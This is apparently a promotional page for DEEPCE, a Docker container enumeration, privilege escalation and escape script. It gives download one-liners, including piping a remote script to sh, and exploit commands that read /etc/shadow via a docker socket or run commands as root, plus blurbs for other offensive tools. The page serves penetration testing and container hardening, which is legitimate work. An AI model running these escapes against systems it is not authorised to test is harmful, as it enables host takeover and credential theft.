Tailored for professionals who seek to elevate their Docker container security game, this powerful suite offers advanced enumeration, privilege escalation, and container escape functionalities.
Designed with utmost compatibility in mind, DEEPCE operates in pure sh, ensuring it seamlessly integrates into any container environment.
## .
## ## ## ==
## ## ## ## ===
/"""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ / ===- ~~~
\______ X __/
\ \ __/
\____\_______/
__
____/ /__ ___ ____ ________
/ __ / _ \/ _ \/ __ \/ ___/ _ \ ENUMERATE
/ /_/ / __/ __/ /_/ / (__/ __/ ESCALATE
\__,_/\___/\___/ .___/\___/\___/ ESCAPE
/_/
Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
In order for it to be compatible with the maximum number of containers, DEEPCE is written in pure sh with no dependencies.
It will make use of additional tools such as curl, nmap, nslookup and dig if available, but for the most part is not reliant upon them for enumeration.
None of the enumeration should touch the disk, however most of the exploits create new containers which will cause disk writes, and some exploits will overwrite runC which can be destructive, so be careful!
Please see below for a list of the enumerations, exploits and payloads DEEPCE can use. If you have ideas for anymore please submit an issue in github!
DEEPCE can be downloaded onto a host or container using one of the following one-liners. Tip: download to /dev/shm
to avoid touching the disk.
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh
For more please view the docs folder
The following is the list of enumerations performed by DEEPCE.
For each of the exploits above payloads can be defined in order to exploit the host system. These include:
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh
The following examples show the different kinds of exploits that can be performed and the avaliable payloads.
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
Exploit a writable docker sock file in order to print the contents of /etc/shadow
./deepce.sh --no-enumeration --exploit SOCK --shadow
Escalate to root via membership to the docker group on a host and run a custom payload
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"
It is possible to download and run deepce without touching the disk, however you will be unable to easily set arguments (direct manipulation of variables is possible using export).
wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
Thanks for HIBP and this downloader. At first I was considering using it, but the…
Comprehensive repository for presentation slides from major cybersecurity conferences held in 2023 and 2024. It…
Generate a proxy dll for arbitrary dll, while also loading a user-defined secondary dll. In…
DLL Universal Patcher is a flexible and convenient code patcher that doesn't touch the files…
RustiveDump is a Rust-based tool designed to dump the memory of the lsass.exe process using…
This C# program finds Windows Defender folder exclusions using Windows Defender through its command-line tool…